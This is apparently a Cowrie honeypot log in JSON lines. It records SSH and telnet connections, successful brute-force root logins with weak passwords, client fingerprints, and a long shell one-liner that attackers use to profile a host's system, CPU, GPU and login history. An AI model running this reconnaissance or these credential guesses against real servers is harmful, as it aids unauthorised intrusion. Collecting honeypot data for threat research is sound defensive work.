{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:22:40.190886Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:22:40.191784Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:22:40.192793Z","src_ip":"212.227.235.229","session":"7ddf02eb204f"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:22:40.964296Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:22:41.606932Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.607611Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.608437Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.609493Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.610398Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.611205Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.611932Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.613046Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.613825Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.614581Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.615214Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.616006Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.616472Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.954984Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.955873Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:22:41.956713Z","src_ip":"212.227.125.160","session":"f8dc4a2c0299"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:22:48.536659Z","src_ip":"212.227.125.160","session":"84076bd7c522"}
{"eventid":"cowrie.session.connect","src_ip":"1.92.34.210","src_port":59112,"dst_ip":"1.2.3.4","dst_port":22,"session":"8075f7b24e3a","protocol":"ssh","message":"New connection: 1.92.34.210:59112 (1.2.3.4:22) [session: 8075f7b24e3a]","sensor":"my-vps","timestamp":"2025-09-08T19:23:10.846934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:23:10.852969Z","src_ip":"1.92.34.210","session":"8075f7b24e3a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T19:23:11.083066Z","src_ip":"1.92.34.210","session":"8075f7b24e3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42620,"dst_ip":"1.2.3.4","dst_port":23,"session":"f83a2b7d6531","protocol":"telnet","message":"New connection: 212.227.235.229:42620 (1.2.3.4:23) [session: f83a2b7d6531]","sensor":"my-vps","timestamp":"2025-09-08T19:23:36.054008Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61594,"dst_ip":"1.2.3.4","dst_port":22,"session":"a70c92e82043","protocol":"ssh","message":"New connection: 217.72.205.35:61594 (1.2.3.4:22) [session: a70c92e82043]","sensor":"my-vps","timestamp":"2025-09-08T19:23:46.641855Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:23:46.643303Z","src_ip":"217.72.205.35","session":"a70c92e82043"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44374,"dst_ip":"1.2.3.4","dst_port":22,"session":"d86c08994a95","protocol":"ssh","message":"New connection: 212.227.235.229:44374 (1.2.3.4:22) [session: d86c08994a95]","sensor":"my-vps","timestamp":"2025-09-08T19:24:02.838451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:24:02.867961Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:24:03.173021Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:24:04.524232Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41518,"dst_ip":"1.2.3.4","dst_port":22,"session":"45328de0c5fd","protocol":"ssh","message":"New connection: 212.227.125.160:41518 (1.2.3.4:22) [session: 45328de0c5fd]","sensor":"my-vps","timestamp":"2025-09-08T19:24:04.685392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:24:04.686420Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.036657Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:24:05.151461Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.152149Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.152619Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.153572Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.154508Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.155316Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.155953Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.156943Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.157565Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.158674Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.159154Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.159654Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.160103Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.563922Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.564822Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:24:05.566120Z","src_ip":"212.227.235.229","session":"d86c08994a95"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:24:06.232727Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:24:07.173146Z","src_ip":"212.227.125.160","session":"45328de0c5fd"}
